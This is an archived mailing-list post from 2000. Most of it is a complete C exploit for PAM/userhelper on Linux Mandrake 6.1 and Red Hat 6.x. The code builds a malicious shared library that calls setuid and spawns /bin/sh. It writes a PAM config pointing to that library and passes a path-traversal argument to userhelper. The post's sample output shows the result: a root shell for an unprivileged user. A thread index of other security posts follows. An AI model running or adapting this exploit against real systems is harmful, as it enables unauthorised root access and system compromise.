Vulnerability Development mailing list archives
Linux Mandrake 6.1 PAM/userhelper exploit
From: prrar () NITNET COM BR (Paulo Ribeiro)
Date: Thu, 16 Mar 2000 23:09:41 +0000
/* * pam-mdk.c (C) 2000 Paulo Ribeiro * * DESCRIPTION: * ----------- * Linux Mandrake 6.1 has the same problem as Red Hat Linux 6.x but its * exploit (pamslam.sh) doesn't work on it (at least on my machine). So, * I created this C program based on it which exploits PAM/userhelper * and gives you UID 0. * * SYSTEMS TESTED: * -------------- * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1. * * RESULTS: * ------- * [prrar@linux prrar]$ id * uid=501(prrar) gid=501(prrar) groups=501(prrar) * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk * [prrar@linux prrar]$ ./pam-mdk * sh-2.03# id * uid=0(root) gid=501(prrar) groups=501(prrar) * sh-2.03# */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { FILE *fp; strcpy(argv[0], "vi test.txt"); fp = fopen("abc.c", "a"); fprintf(fp, "#include<stdlib.h>\n"); fprintf(fp, "#include<unistd.h>\n"); fprintf(fp, "#include<sys/types.h>\n"); fprintf(fp, "void _init(void) {\n"); fprintf(fp, "\tsetuid(geteuid());\n"); fprintf(fp, "\tsystem(\"/bin/sh\");\n"); fprintf(fp, "}"); fclose(fp); system("echo -e auth\trequired\t$PWD/abc.so > abc.conf"); system("chmod 755 abc.conf"); system("gcc -fPIC -o abc.o -c abc.c"); system("ld -shared -o abc.so abc.o"); system("chmod 755 abc.so"); system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf"); system("rm -rf abc.*"); } /* pam-mdk.c: EOF */ ___________________________________ Paulo Ribeiro prrar () nitnet com br
Current thread:
- Extending the FTP "ALG" vulnerability to any FTP client, (continued)
- Extending the FTP "ALG" vulnerability to any FTP client Mikael Olsson (Mar 10)
- DoS in ArGoSoft FTP Server, Version 1.04 (1.0.4.4) for win* Knud Erik Højgaard (Feb 11)
- Re: Extending the FTP "ALG" vulnerability to any FTP client Dug Song (Mar 11)
- Security auditing of network infrastructure Martin M Samson (Mar 11)
- information being stored from cgi forms Bob Johnson (Mar 10)
- Re: information being stored from cgi forms Crispin Cowan (Mar 10)
- Re: spoofing the ethernet address John Flux (Mar 14)
- Re: spoofing the ethernet address Juan M. Courcoul (Mar 15)
- Linux Mandrake 6.1 PAM/userhelper exploit Paulo Ribeiro (Mar 16)
- AIM 3.0 Buffer Overflow exploit lewkir () YAHOO COM (Mar 17)
- Re: AIM 3.0 Buffer Overflow exploit Jamal Hendershot (Mar 19)
- Re: AIM 3.0 Buffer Overflow exploit - - (Mar 21)
- Re: spoofing the ethernet address Ex Machina (Mar 22)
- Re: spoofing the ethernet address (license managers) Eric Sherrill (Mar 24)
- IPSec research Bep Verberk (Mar 24)
- Re: IPSec research Dug Song (Mar 24)